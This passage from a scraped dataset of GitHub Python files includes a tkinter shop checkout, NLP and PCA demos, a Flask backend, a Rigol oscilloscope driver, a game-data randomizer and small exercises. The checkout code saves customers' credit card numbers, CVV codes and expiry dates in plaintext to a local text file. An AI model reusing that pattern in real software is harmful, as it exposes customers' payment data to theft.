font=(\"Calibri\", 10, \"bold\")).place(relx=0.25, rely=0.575)\n Label(chk, text = sum(nasasuper)*(price[1]), width=10, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.25, rely=0.625)\n Label(chk, text = sum(heatwave)*(price[2]), width=10, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.25, rely=0.675)\n Label(chk, text = sum(zoomer)*(price[3]), width=10, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.25, rely=0.725)\n total = Label(chk, text = sum(quadstellar)*(price[0]) + sum(moonrock)*(price[1]) + sum(snowflake)*(price[2]) + sum(boomer)*(price[3]) + sum(interstellar)*(price[0]) + sum(nasasuper)*(price[1]) + sum(heatwave)*(price[2]) + sum(zoomer)*(price[3]), width=10, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.25, rely=0.775) #label which gets the total price of all items\n \n #(OKASHA) \n Label(chk, text = \"First Name: *\", width=18, height=2, bg=\"orange\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.43, rely=0.320) #label for first name entry\n e1 = Entry(chk, borderwidth=3, relief=\"solid\") #entry for first name label\n e1.place(relx=0.60, rely=0.320, height=37) #coords for entry box\n e1.get() #gets info written in entry box \n Label(chk, text = \"Last Name: *\", width=18, height=2, bg=\"orange\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.43, rely=0.370)\n e2 = Entry(chk, borderwidth=3, relief=\"solid\")\n e2.place(relx=0.60, rely=0.370, height=37)\n e2.get()\n Label(chk, text = \"Phone Number: *\", width=18, height=2, bg=\"orange\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.43, rely=0.420)\n e3 = Entry(chk, borderwidth=3, relief=\"solid\")\n e3.place(relx=0.60, rely=0.420, height=37)\n e3.get()\n Label(chk, text = \"Email Address: *\", width=18, height=2, bg=\"orange\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.43, rely=0.470)\n e4 = Entry(chk, borderwidth=3, relief=\"solid\")\n e4.place(relx=0.60, rely=0.470, height=37)\n e4.get()\n Label(chk, text = \"Address: *\", width=18, height=2, bg=\"orange\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.43, rely=0.520)\n e5 = Entry(chk, borderwidth=3, relief=\"solid\")\n e5.place(relx=0.60, rely=0.520, height=37)\n e5.get()\n Label(chk, text = \"Address: (optional)\", width=18, height=2, bg=\"orange\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.43, rely=0.570)\n Entry(chk, borderwidth=3, relief=\"solid\").place(relx=0.60, rely=0.570, height=37)\n Label(chk, text = \"City: *\", width=18, height=2, bg=\"orange\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.43, rely=0.620)\n e6 = Entry(chk, borderwidth=3, relief=\"solid\")\n e6.place(relx=0.60, rely=0.620, height=37)\n e6.get()\n Label(chk, text = \"Province/State: *\", width=18, height=2, bg=\"orange\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.43, rely=0.670)\n e7 = Entry(chk, borderwidth=3, relief=\"solid\")\n e7.place(relx=0.60, rely=0.670, height=37)\n e7.get()\n Label(chk, text = \"Country: *\", width=18, height=2, bg=\"orange\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.43, rely=0.720)\n e8 = Entry(chk, borderwidth=3, relief=\"solid\")\n e8.place(relx=0.60, rely=0.720, height=37)\n e8.get()\n Label(chk, text = \"Postal Code/Zip Code: *\", width=18, height=2, bg=\"orange\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.43, rely=0.770)\n e9 = Entry(chk, borderwidth=3, relief=\"solid\")\n e9.place(relx=0.60, rely=0.770, height=37)\n e9.get()\n Label(chk, text=\"Credit Card Number: *\", width=18, height=2, bg=\"orange\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.43, rely=0.820)\n e10 = Entry(chk, borderwidth=3, relief=\"solid\")\n e10.place(relx=0.60, rely=0.820, height=37)\n e10.get()\n Label(chk, text=\"CVV Code: *\", width=18, height=2, bg=\"orange\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.43, rely=0.870)\n e11 = Entry(chk, borderwidth=3, relief=\"solid\")\n e11.place(relx=0.60, rely=0.870, height=37)\n e11.get()\n Label(chk, text=\"Expiration Date: *\", width=18, height=2, bg=\"orange\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.43, rely=0.920)\n e12 = Entry(chk, borderwidth=3, relief=\"solid\")\n e12.place(relx=0.60, rely=0.920, height=37)\n e12.get()\n Button(chk, text=\"Checkout\", width=14, height=1, bg=\"#383838\", fg=\"white\", command=save_data, font=(\"Calibri\", 13, \"bold\")).place(relx=0.79, rely=0.920) #button which initiates save data function\n chk.mainloop() \n \ndef save_data(): #save data function initiated by the button #(HARNOOR AND OKASHA)\n if e1.get()==\"\" or e2.get()==\"\" or e3.get()==\"\" or e4.get()==\"\" or e5.get()==\"\" or e6.get()==\"\" or e7.get()==\"\" or e8.get()==\"\" or e9.get()==\"\" or e10.get()==\"\" or e11.get()==\"\" or e12.get()==\"\": #writes errors if entry boxes are empty\n tkinter.messagebox.showerror(\"Error\", \"Please fill out all required fields.\") #shows tkinter.messagebox error\n chk.destroy()\n else:\n fileD = open(\"database.txt\", \"a\") #opens text file which gets ready to append data and eventually close\n fileD.write(\"First Name:\\n\")\n fileD.write(\"%s\\n\" % e1.get()) #writes data recieved from entry field by using get and imports it in to text file\n fileD.write(\"Last Name:\\n\")\n fileD.write(\"%s\\n\" %e2.get())\n fileD.write(\"Phone Number:\\n\")\n fileD.write(\"%s\\n\" %e3.get())\n fileD.write(\"Email Address:\\n\")\n fileD.write(\"%s\\n\" %e4.get())\n fileD.write(\"Address:\\n\")\n fileD.write(\"%s\\n\" %e5.get())\n fileD.write(\"City:\\n\")\n fileD.write(\"%s\\n\" %e6.get())\n fileD.write(\"Province/State:\\n\")\n fileD.write(\"%s\\n\" %e7.get())\n fileD.write(\"Country:\\n\")\n fileD.write(\"%s\\n\" %e8.get())\n fileD.write(\"Postal Code/Zip Code:\\n\")\n fileD.write(\"%s\\n\" %e9.get())\n fileD.write(\"Credit Card Number:\\n\")\n fileD.write(\"%s\\n\" %e10.get())\n fileD.write(\"CVV Code:\\n\")\n fileD.write(\"%s\\n\" %e11.get())\n fileD.write(\"Expiration Date:\\n\")\n fileD.write(\"%s\\n\" %e12.get())\n tkinter.messagebox.showinfo(\"Success\", \"Your order has been placed!\") #if the entry boxes are not empty and everything is filled, shows success\n quadstellar.clear() #clears all items from carts\n moonrock.clear()\n snowflake.clear()\n boomer.clear()\n interstellar.clear()\n nasasuper.clear()\n heatwave.clear()\n zoomer.clear()\n addtocart.set(0) #sets main cart to 0\n chk.destroy()\n \n#(HARNOOR)\n \ndef cartqty1():\n addtocart.set(addtocart.get() +1) #adds 1 to main cart/list (for quantity)\n quadstellar.append(quantity[0]) #appends the price of a quadstellar pc to the prices list.\n \ndef cartqty2():\n addtocart.set(addtocart.get() +1)\n moonrock.append(quantity[0])\n \ndef cartqty3():\n addtocart.set(addtocart.get() +1)\n snowflake.append(quantity[0]) \n \ndef cartqty4():\n addtocart.set(addtocart.get() +1)\n boomer.append(quantity[0])\n \n#(OKASHA) \n \ndef cartqty5():\n addtocart.set(addtocart.get() +1)\n interstellar.append(quantity[0])\n \ndef cartqty6():\n addtocart.set(addtocart.get() +1)\n nasasuper.append(quantity[0])\n \ndef cartqty7():\n addtocart.set(addtocart.get() +1)\n heatwave.append(quantity[0])\n \ndef cartqty8():\n addtocart.set(addtocart.get() +1)\n zoomer.append(quantity[0])\n \napp.mainloop() #re loops form","repo_name":"okashashuda/product-ordering-system","sub_path":"product_ordering_system.py","file_name":"product_ordering_system.py","file_ext":"py","file_size_in_byte":24071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39384115967","text":"import pandas as pd\nimport numpy as np\nfrom nlpia.data.loaders import get_data\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom nltk.tokenize.casual import casual_tokenize\nfrom sklearn.decomposition import PCA\nfrom sklearn.decomposition import TruncatedSVD\n\n\npd.options.display.width = 120\n\nsms = get_data('sms-spam')\nindex = ['sms{}{}'.format(i, '!' * j) for (i, j) in zip(range(len(sms)), sms.spam)]\n\nsms.index = index\nprint(sms.head(6))\n\ntfidf = TfidfVectorizer(tokenizer=casual_tokenize)\ntfidf_docs = tfidf.fit_transform(raw_documents=sms.text).toarray()\nprint('\\nLen TF-IDF vocabulary:', len(tfidf.vocabulary_))\n\ntfidf_docs = pd.DataFrame(tfidf_docs)\n# center vectorized documents (BOW vectors) by subtracting the mean\ntfidf_docs = tfidf_docs - tfidf_docs.mean()\nprint('TF-IDF shape:', tfidf_docs.shape)\nprint(\"sms.spam.sum()\", sms.spam.sum())\n\n\npca = PCA(n_components=16)\npca = pca.fit(tfidf_docs)\npca_topic_vectors = pca.transform(tfidf_docs)\ncolumns = ['topic{}'.format(i) for i in range(pca.n_components)]\npca_topic_vectors = pd.DataFrame(pca_topic_vectors, columns=columns, index=index)\nprint(pca_topic_vectors.round(3).head(6))\n\n# print(tfidf.vocabulary_)\ncolumn_nums, terms = zip(*sorted(zip(tfidf.vocabulary_.values(), tfidf.vocabulary_.keys())))\n# print(terms)\n\n# get weights from PCA for words in vocabulary\nweights = pd.DataFrame(pca.components_, columns=terms, index=['topic{}'.format(i) for i in range(16)])\npd.options.display.max_columns = 0\nprint(weights.head(4).round(3))\n\nprint('\\n\\nShow weights for each topic for words in example')\npd.options.display.max_columns = 12\ndeals = weights['! ;) :) half off free crazy deal only $ 80 %'.split()].round(3) * 100\nprint(deals)\nprint('\\ndeals.T.sum()\\n', deals.T.sum())\n\nprint('\\n\\nTESTING and comparing TruncatedSVD Vs PCA')\nsvd = TruncatedSVD(n_components=16, n_iter=100)\nsvd_topic_vectors = svd.fit_transform(tfidf_docs.values)\nsvd_topic_vectors = pd.DataFrame(svd_topic_vectors, columns=columns, index=index)\nprint(svd_topic_vectors.round(3).head(6))\n\n# Normalize each topic vector by its length (L2-norm) allows you to compute the cosine\n# distance with a dot product\nsvd_topic_vectors = (svd_topic_vectors.T / np.linalg.norm(svd_topic_vectors, axis=1)).T\nprint('\\n\\nCheck LSA for spam classification')\nprint(svd_topic_vectors.iloc[:10].dot(svd_topic_vectors.iloc[:10].T).round(1))\n","repo_name":"VolDonets/natural_language_processing","sub_path":"part_3/e5_PCA_on_sms_spam.py","file_name":"e5_PCA_on_sms_spam.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19236831200","text":"from flask import Flask, make_response, jsonify, render_template\n\nfrom Item import Item\nfrom ItemCache import ItemCache\nfrom NetworkRequest import NetworkRequest\nfrom TamperDetector import TamperDetector\n\napp = Flask(__name__, template_folder='templates')\n\n\n@app.route('/')\ndef landing():\n \"\"\"\n Landing page that describes the endpoints\n \"\"\"\n return render_template('index.html')\n\n\n@app.route('/tamper/')\ndef tamper(barcode):\n \"\"\"\n Detects damage or tamper to a particular package indicated by barcode\n\n :return True if item has been damaged false otherwise\n \"\"\"\n\n item = ItemCache.get_instance().get_item(barcode)\n response = TamperDetector.detect(item)\n\n return make_response(jsonify(response), 200)\n\n\n@app.route('/get/')\ndef get(barcode):\n \"\"\"\n fetch the data from SICK Package Analytics\n\n :param barcode:\n :return: {\n results : {\n \n }\n systems: {\n \n }\n }\n }\n \"\"\"\n json_response = NetworkRequest.send_request(barcode)\n # print(json_response)\n if json_response is not None and \"results\" in json_response and json_response[\"results\"]:\n # only add item if response contains data\n item = Item(json_response[\"results\"])\n ItemCache.get_instance().add_item(barcode, item)\n # NetworkRequest.send_request_pictures(item, barcode)\n # print(\"sending picture request\")\n return make_response(item.get_data_json(), 200)\n else:\n return make_response(jsonify(json_response), 200)\n\n\n@app.route('/get_pictures/')\ndef get_pictures(barcode):\n \"\"\"\n retrieve the pictures of a particular item and return them as a JSON with\n the \"results\" mapped to the dictionary of pictures in item\n {\n \"results\": \n }\n\n if no item present for the barcode request returns\n {\n \"results\": null\n }\n \"\"\"\n resp = {}\n item = ItemCache.get_instance().get_item(barcode)\n if item is None:\n resp[\"results\"] = None\n else:\n resp[\"results\"] = NetworkRequest.send_request_pictures(item)\n # print(resp)\n return make_response(jsonify(resp), 200)\n\n\n@app.route('/get_system_config')\ndef get_system_config():\n \"\"\"\n Gets the system configuration for facility 1 (defined in the url endpoint)\n returns a dictionary that maps system to another map of deviceId to deviceName\n\n :return: see example below\n {\n \"1\": {\n \"1\": \"Top\",\n \"2\": \"LF\",\n \"3\": \"LB\",\n \"4\": \"RB\",\n \"5\": \"RF\",\n \"6\": \"Bot\",\n \"7\": \"CLV1\",\n \"8\": \"CLV2\",\n },\n ...\n }\n \"\"\"\n return make_response(jsonify(NetworkRequest.send_request_system_config()))\n\n\nif __name__ == '__main__':\n # print(__name__)\n # app.run(debug=True)\n app.run(host=\"192.168.0.221\", debug=True)\n","repo_name":"Huw-man/SickAR_backend","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36627740214","text":"import requests\nimport sys\nfrom .parser import parse_html\n\ndef parse_test(url):\n proxies = {\n 'http': 'http://10.120.193.201:8123'\n }\n\n r = requests.get(url, proxies=proxies)\n if r.status_code != 200:\n print(\"Error, status code is {0}\".format(r.status_code))\n return\n\n print(\"Result:\")\n print(parse_html(r.text))\n\nif len(sys.argv) < 2:\n print(\"Usage: {0} url\".format(sys.argv[0]))\nelse:\n parse_test(sys.argv[1])\n","repo_name":"ogigoc/deep-web-hackathon","sub_path":"parsing/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"38691182889","text":"import json\r\nfrom datetime import datetime\r\nimport pandas as pd\r\nimport re\r\nwith open('competitors2.json', 'r', encoding='utf-8') as file1, open('results_RUN.txt') as file2:\r\n competitors = json.load(file1)\r\n result = {}\r\n\r\n for i in file2.readlines():\r\n \r\n i = i.replace('п»ї', '').split()\r\n result.setdefault(i[0], []).extend(i[1:])\r\n\r\n\r\n for key, val in result.items():\r\n z = datetime.strptime(val[3], '%H:%M:%S,%f') - datetime.strptime(val[1], '%H:%M:%S,%f')\r\n val.clear()\r\n val.append(z)\r\n\r\n k = [(i[0], str(*i[1])[2:10].replace('.', ',')) for i in sorted(result.items(), key=lambda item: item[1])[:4]]\r\n\r\n counter = 1\r\n df = pd.DataFrame()\r\n for i in k:\r\n new_df = pd.DataFrame([{'Занятое место': counter, 'Нагрудны�� номер': i[0], 'Имя': competitors[i[0]]['Surname'], 'Фамилия': competitors[i[0]]['Name'], 'Результат': i[1]}])\r\n df = pd.concat([df, new_df], axis=0, ignore_index=True)\r\n counter += 1\r\nprint(df) \r\n","repo_name":"AnnaOborovskaya/07-08-2023-AnnaOborovskaya","sub_path":"winners.py","file_name":"winners.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"42643403360","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# Build lists of multiples of 3 & 5.\ndef multiples():\n b = 3\n c = 5\n x = []\n y = []\n for i in range(34):\n x.append(b*i)\n for i in range(21):\n y.append(c*i)\n return x, y\n\n# Print 'Fizz', 'Buzz', 'Fizzbuzz', or number from value in list.\ndef fizzbuzz(num):\n # Print 'fizz' if multiple of 3 and not 5\n if (num in x) & (num not in y):\n print('fizz')\n return\n # Print 'buzz' if multiple of 5 and not 3\n if (num in y) & (num not in x):\n print('buzz')\n return\n # Print 'fizzbuzz' if multiple of both 3 and 5\n if (num in x) & (num in y):\n print('fizzbuzz')\n return\n # Print value if none of the above apply\n else:\n print(num)\n return\n\n# Create a list of 1 - 100.\ndef create_list():\n list_to_use = []\n # Create a list from 0 - 100\n for i in range(101):\n # Build list.\n list_to_use.append(i)\n # Remove first value, a '0'\n list_to_use.pop(0)\n # Return list of 1 - 100\n return list_to_use\n\n# Program.\ndef main():\n # Get list of numbers ranging from 1 - 100.\n numbers = create_list()\n # Iterate through list for to FizzBuzz\n for n in numbers:\n fizzbuzz(n)\n return\n\n# Run Program.\nif __name__ == '__main__':\n main()\n","repo_name":"willinbeantown/thingsToShare","sub_path":"my_fizzbuzz/fizzbuzz.py","file_name":"fizzbuzz.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19171383499","text":"#!/usr/bin/env python3\n\nimport argparse\nfrom .helper import EndPointManager\n\n\ndef main():\n parser = argparse.ArgumentParser(description='AWS Client VPN EndPoint Manager')\n parser.add_argument('config_section', help='A section name from ~/.aws-vpn.cfg')\n parser.add_argument('action', choices=['up', 'down'], help='The action to take on the endpoint')\n parser.add_argument('--profile', help='The AWS profile')\n _args = parser.parse_args()\n if _args.action == 'up':\n EndPointManager(_args).bring_up()\n elif _args.action == 'down':\n EndPointManager(_args).bring_down()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jingxue/aws-vpn-helper","sub_path":"aws_vpn_helper/bring.py","file_name":"bring.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11618971623","text":"N = int(input())\r\n\r\ncount = 3\r\nlevel = 0\r\nS = [3]\r\nwhile count < N:\r\n level += 1\r\n count += level+3 + count\r\n S.append(count)\r\n \r\ndef Search(L):\r\n global count\r\n global N\r\n \r\n if L == 0:\r\n return\r\n \r\n a = N - S[L-1]\r\n if a <= 0:\r\n return Search(L-1)\r\n elif 1 <= a <= L+3:\r\n N = a\r\n return\r\n else:\r\n N -= S[L-1] + L+3\r\n return Search(L-1)\r\n \r\nSearch(level)\r\n\r\nif N == 1:\r\n print(\"m\")\r\nelse:\r\n print(\"o\")","repo_name":"KongUm/BOJ","sub_path":"백준/Gold/5904. Moo 게임/Moo 게임.py","file_name":"Moo 게임.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14709448126","text":"from random import choice\n\nfrom skytemple_files.common.types.file_types import FileType\nfrom skytemple_files.data.md.protocol import MdProtocol, IQGroup, PokeType, Ability\nfrom skytemple_randomizer.randomizer.abstract import AbstractRandomizer\nfrom skytemple_randomizer.status import Status\n\nVALID_IQ_GROUPS = [\n IQGroup.A, IQGroup.B, IQGroup.C, IQGroup.D, IQGroup.E, IQGroup.F,\n IQGroup.G, IQGroup.H, IQGroup.I, IQGroup.J\n]\nVALID_FIRST_TYPE = [\n PokeType.NORMAL, PokeType.FIRE, PokeType.WATER, PokeType.GRASS,\n PokeType.ELECTRIC, PokeType.ICE, PokeType.FIGHTING, PokeType.FIGHTING, PokeType.POISON,\n PokeType.GROUND, PokeType.FLYING, PokeType.PSYCHIC, PokeType.BUG, PokeType.ROCK,\n PokeType.GHOST, PokeType.DRAGON, PokeType.DARK, PokeType.STEEL\n]\nVALID_SECOND_TYPE = VALID_FIRST_TYPE + [PokeType.NONE]\n\n\nclass MonsterRandomizer(AbstractRandomizer):\n def step_count(self) -> int:\n if self._has_something_to_randomize():\n return 1\n return 0\n\n def run(self, status: Status):\n if not self._has_something_to_randomize():\n return status.done()\n status.step(\"Randomizing Pok��mon data...\")\n md: MdProtocol = FileType.MD.deserialize(self.rom.getFileByName('BALANCE/monster.md'))\n num_entities = FileType.MD.properties().num_entities\n for midx in range(0, num_entities):\n if len(md.entries) <= midx + num_entities:\n continue\n base_entry = md.entries[midx]\n secn_entry = md.entries[midx + num_entities]\n if self.config['pokemon']['iq_groups']:\n group = choice(VALID_IQ_GROUPS)\n base_entry.iq_group = group.value\n secn_entry.iq_group = group.value\n\n if self.config['pokemon']['typings']:\n type1 = choice(VALID_FIRST_TYPE)\n type2 = choice(VALID_SECOND_TYPE)\n while type1 == type2:\n type2 = choice(VALID_SECOND_TYPE)\n base_entry.type_primary = type1.value\n secn_entry.type_primary = type1.value\n base_entry.type_secondary = type2.value\n secn_entry.type_secondary = type2.value\n\n if self.config['pokemon']['abilities']:\n ability_ids = self.config['pokemon']['abilities_enabled'] + [Ability.NONE.value]\n if len(ability_ids) > 0:\n ability1 = Ability(choice(ability_ids))\n ability2 = Ability(choice(ability_ids))\n while ability2 == ability1:\n ability2 = Ability(choice(ability_ids))\n base_entry.ability_primary = ability1.value\n base_entry.ability_secondary = ability2.value\n secn_entry.ability_primary = ability1.value\n secn_entry.ability_secondary = ability2.value\n\n self.rom.setFileByName('BALANCE/monster.md', FileType.MD.serialize(md))\n\n status.done()\n\n def _has_something_to_randomize(self):\n return self.config['pokemon']['iq_groups'] or \\\n self.config['pokemon']['typings'] or \\\n self.config['pokemon']['abilities']\n","repo_name":"SkyTemple/skytemple-randomizer","sub_path":"skytemple_randomizer/randomizer/monster.py","file_name":"monster.py","file_ext":"py","file_size_in_byte":3191,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"37"} +{"seq_id":"33118054339","text":"#!/usr/bin/python\n\nimport csv, numpy\nfrom pylab import *\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndef compareScatter(file1,keycol1,valcol1,file2,keycol2,valcol2,file3,keycol3,valcol3):\n\treader=csv.reader(file(\"./Datasets/\"+file1))\n\theaderRow=reader.next()\n\ta_file1=numpy.array(list(reader))\n\t\n\treader=csv.reader(file(\"./Datasets/\"+file2))\n\theaderRow=reader.next()\n\ta_file2=numpy.array(list(reader))\n\t\n\treader=csv.reader(file(\"./Datasets/\"+file3))\n\theaderRow=reader.next()\n\ta_file3=numpy.array(list(reader))\n\t\n\ta_file1_slice=a_file1[:,keycol1-1],a_file1[:,valcol1-1]\n\ta_file2_slice=a_file2[:,keycol2-1],a_file2[:,valcol2-1]\n\ta_file3_slice=a_file3[:,keycol3-1],a_file3[:,valcol3-1]\n\t\n\td_file1=dict(zip(*a_file1_slice))\n\td_file2=dict(zip(*a_file2_slice))\n\td_file3=dict(zip(*a_file3_slice))\n\t\n\ta_joined=numpy.array([(k,d_file1.get(k),d_file2.get(k),d_file3.get(k))\n\t for k in set(d_file1.iterkeys()).union(d_file2.iterkeys()).union(d_file3.iterkeys())])\n\t\n\t\n\tx=map(float,a_joined[:,1])\n\ty=map(float,a_joined[:,2])\n\tz=map(float,a_joined[:,3])\n\t\n\treturn x,y,z\n\n\na_education,a_employment,a_health=compareScatter(\"education2010.csv\",1,6,\"employment2010.csv\",1,6,\"health2010.csv\",1,6)\n\nax=subplot(221)\nax.scatter(a_education,a_employment,s=1)\nax.set_xticklabels([])\nax.set_yticklabels([])\nax.set_title(\"Education vs employment\")\nax.set_xlabel(\"Education\")\nax.set_ylabel(\"Employment\")\n\nax=subplot(222)\nax.scatter(a_education,a_health,s=1)\nax.set_xticklabels([])\nax.set_yticklabels([])\nax.set_title(\"Education vs health\")\nax.set_xlabel(\"Education\")\nax.set_ylabel(\"Health\")\n\nax=subplot(223)\nax.scatter(a_employment,a_health,s=1)\nax.set_xticklabels([])\nax.set_yticklabels([])\nax.set_title(\"Employment vs health\")\nax.set_xlabel(\"Employment\")\nax.set_ylabel(\"Health\")\n\nax=subplot(224,projection='3d')\nax.scatter(a_education,a_employment,a_health,s=1)\nax.set_xticklabels([])\nax.set_yticklabels([])\nax.set_zticklabels([])\nax.set_title(\"Employment vs education vs health\")\nax.set_xlabel(\"Education\")\nax.set_ylabel(\"Employment\")\nax.set_zlabel(\"Health\")\n\t\nshow()\n\n\n\n","repo_name":"markheseltine/openknowledge","sub_path":"OpenDataDay2013/scatter_plot.py","file_name":"scatter_plot.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36327119426","text":"import testgear.base_classes as base\nimport numpy as np\nimport time\n\nclass DS2072(base.scope):\n def init(self):\n self.idstr = self.query(\"*IDN?\").strip()\n\n\n def set_time_date(self):\n pass\n\n\n def opc(self):\n while True:\n if self.query(\"*OPC?\").strip() == \"1\":\n break\n\n\n def screenshot(self, filename=None):\n if filename is None:\n filename = time.strftime(\"%Y%m%d-%H%M%S\")+\"_DS2000.bmp\"\n\n self.write(\":DISPlay:DATA?\")\n img = self.resource.read_raw()\n newFile = open(filename, \"wb\")\n newFile.write(img[11:-1])\n\n\n def run(self):\n self.write(\":RUN\")\n\n\n def stop(self):\n self.write(\":STOP\")\n\n \n def single(self, wait=True, forced=False):\n self.write(\":SINGle\")\n self.opc()\n if forced:\n self.force_trigger()\n\n if wait:\n while True:\n if self.query(\":TRIGger:STATus?\").strip() == \"STOP\":\n break\n\n self.opc()\n \n\n def force_trigger(self):\n self.write(\":TFORce\")\n\n\n def get_waveform_memory(self, channel=1):\n #use this method to get the whole memory\n mdepth = int(self.query(\":ACQuire:MDEPth?\"))\n\n sr = float(self.query(\":ACQuire:SRATe?\"))\n\n self.write(\":STOP\")\n self.write(\":WAV:SOUR CHAN{0:d}\".format(channel))\n self.write(\":WAV:MODE RAW\")\n self.write(\":WAVeform:POINts {0:d}\".format(mdepth))\n self.write(\":WAV:RES\")\n self.write(\":WAV:BEG\")\n\n sample = []\n\n while True:\n status = self.query(\":WAV:STAT?\")\n print(\"lese Daten..\")\n self.write(\":WAV:DATA?\")\n data = self.resource.read_raw()\n sample+= list(data[11:-1])\n print(len(sample))\n \n if status[0] == 'I':\n self.write(\":WAV:END\")\n break\n\n yinc = float(self.query(\":WAVeform:YINCrement?\"))\n yorig = float(self.query(\":WAVeform:YORigin?\"))\n yref = float(self.query(\":WAVeform:YREFerence?\"))\n\n xorig = float(self.query(\":WAVeform:XORigin?\"))\n\n s = (np.array(sample) - yref - yorig)*yinc\n t = np.linspace(0, (mdepth-1)*1/sr, num=mdepth) + xorig\n\n return t, s\n\n\n def get_waveform(self, channel=1):\n #returns the datapoints from screen\n self.write(\":WAVeform:SOURce CHAN{0:d}\".format(channel))\n self.write(\":WAV:MODE NORM\")\n self.write(\":WAVeform:FORMat BYTE\")\n \n self.write(\":WAVeform:DATA?\")\n samples = int(self.resource.read_bytes(11)[7:])\n data = self.resource.read_bytes(samples)\n\n xinc = float(self.query(\":WAVeform:XINCrement?\"))\n xorig = float(self.query(\":WAVeform:XORigin?\"))\n\n yinc = float(self.query(\":WAVeform:YINCrement?\"))\n yorig = float(self.query(\":WAVeform:YORigin?\"))\n yref = float(self.query(\":WAVeform:YREFerence?\"))\n\n s = (np.array(list(data)) - yref - yorig)*yinc \n t = np.linspace(0, (len(s)-1)*xinc, num=len(s)) + xorig\n\n return t, s\n\n\n def null_offset(self, channel=1):\n vmax = float(self.query(\":MEASure:VMAX? CHANnel{0:d}\".format(channel)))\n vmin = float(self.query(\":MEASure:VMIN? CHANnel{0:d}\".format(channel)))\n\n if vmin+vmax > 1e9:\n return False\n\n self.write(\":CHANnel{0:d}:OFFSet {1:0.6f}\".format(channel, -1*np.mean([vmax, vmin]) ) )\n \n return True\n\n\n def autoscale(self, channel=1):\n #ToDo: check probe factor\n self.write(\":CHANnel{0:d}:DISPlay 1\".format(channel))\n self.opc()\n probe = float(self.query(\":CHANnel{0:d}:PROBe?\".format(channel)))\n self.single(forced=True)\n\n if float(self.query(\":MEASure:VMAX?\")) > 1e30:\n #print(\"out of range\")\n self.write(\":CHANnel{0:d}:SCALe {1:0.6f}\".format(channel, 10 ))\n self.write(\":CHANnel{0:d}:OFFSet {1:0.6f}\".format(channel, 0 ))\n self.opc()\n self.single(forced=True)\n time.sleep(1)\n \n while True:\n scale = float(self.query(\":CHANnel{0:d}:SCALe?\".format(channel)))\n vmax = float(self.query(\":MEASure:VMAX? CHANnel{0:d}\".format(channel)))\n vmin = float(self.query(\":MEASure:VMIN? CHANnel{0:d}\".format(channel)))\n span = vmax - vmin\n \n if (span * 2 / scale / 8) > 0.2:\n #print(\"passe Offset an\")\n self.write(\":CHANnel{0:d}:OFFSet {1:0.6f}\".format(channel, -1*np.mean([vmax, vmin]) ) )\n \n #print(vmin + span/2)\n\n if (span * 2 / scale / 8) > 0.6:\n #print(\"set fine\")\n self.write(\":CHANnel{0:d}:SCALe {1:0.6f}\".format(channel, span / (8 * 0.8) ))\n break\n\n if scale <= (500e-6 * probe):\n #print(\"limit reached\")\n break\n \n self.write(\":CHANnel{0:d}:SCALe {1:0.6f}\".format(channel, scale/2 ))\n self.single(forced=True)\n \n time.sleep(1)\n \n self.null_offset()","repo_name":"PhilippCo/testgear","sub_path":"testgear/Rigol/DS2072.py","file_name":"DS2072.py","file_ext":"py","file_size_in_byte":5171,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"36363224611","text":"from tkinter import *\r\nimport pyautogui\r\nfrom tkinter.filedialog import asksaveasfile\r\nfrom tkinter.filedialog import askopenfilename\r\nfrom tkinter import ttk\r\nimport re\r\nfrom tkinter import filedialog\r\nimport os\r\nfrom io import StringIO\r\nimport sys\r\n\r\ntext_boxes = []\r\ntabs_list = []\r\n\r\n\r\n#data\r\nkeywords = ['False', 'None', 'True', 'and', 'as', 'assert', 'async', 'await', 'break', 'class', 'continue', 'def', 'del', 'elif', 'else', 'except', 'finally', 'for', 'from', 'global', 'if', 'import', 'in', 'is', 'lambda', 'nonlocal', 'not', 'or', 'pass', 'raise', 'return', 'try', 'while', 'with', 'yield']\r\nbuiltins = ['__build_class__', 